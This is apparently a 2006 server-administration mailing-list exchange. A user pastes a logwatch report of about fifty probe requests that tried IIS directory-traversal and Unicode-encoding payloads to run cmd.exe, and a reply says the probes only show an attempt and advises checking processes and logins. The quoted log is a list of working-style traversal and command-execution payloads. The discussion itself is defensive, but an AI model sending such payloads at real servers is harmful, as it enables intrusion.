Article 7128 at 06/09/20 13:55:26 From: dmobley (at mark) uhostme.net Subject: [coba-e:07128] Re: Concerned

Index: [Article Count Order] [Thread]
Date:  Wed, 20 Sep 2006 13:17:55 -0400
From:  "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
Subject:  [coba-e:07128] Re: Concerned - anything to worry about??
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <003701c6dcd8$b68bf4f0$6400a8c0@YOUR4105E587B6>
In-Reply-To:  <4510D8C2.1030206 (at mark) planetcentral.net>
X-Mail-Count: 07128

Nah, just means they were trying.  Take a look on the server via ssh, check
to see if you see any processes running that shouldn't be.  Look at the last
log to see if any logins occurred that weren't you.

> -----Original Message-----
> From: paul [mailto:paul (at mark) planetcentral.net]
> Sent: Wednesday, September 20, 2006 2:00 AM
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:07105] Concerned - anything to worry about??
> 
> Checked my logwatch mail this morning and found this - is it anything to
> worry about???
> I mean i know they were looking for mostly windows files, but does this
> mean my system's been compromised ????
> 
> Thx
> Paul
> 
>  total of 1 sites probed the server
>   www.mydomain.net 218.92.93.181
> 
> !!!! 50 possible successful probes
>  /cgi-bin/cmd.exe?/c+dir HTTP Response 302
>  /bin/scripts/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302
>  /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /cgi-bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /scripts/root.exe?/c+dir HTTP Response 302
>  /_mem_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302
>  /msadc/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/cmd32.exe?/c+dir HTTP Response 302
>  /msadc/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /scripts/..%c0%2f..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302
>  /msadc/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /Cgi-Bin/cmd32.exe?/c+dir HTTP Response 302
>  /cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /scripts/..%c1%9f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /script/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..?..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/cmd.exe?/c+dir HTTP Response 302
>  /cgi-bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /msadc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302
>  /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302
>  /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /cgi-bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_vti_bin/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /cgi-Bin/cmd.exe?/c+dir HTTP Response 302
>  /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /cgi-bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_vti_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
>  /msadc/..?..?..?../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302
>  /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP Response 302
>  /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302
>  /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
> HTTP Response 302
>  /msadc/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP
> Response 302
> 
> 
> 
> 
> --
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.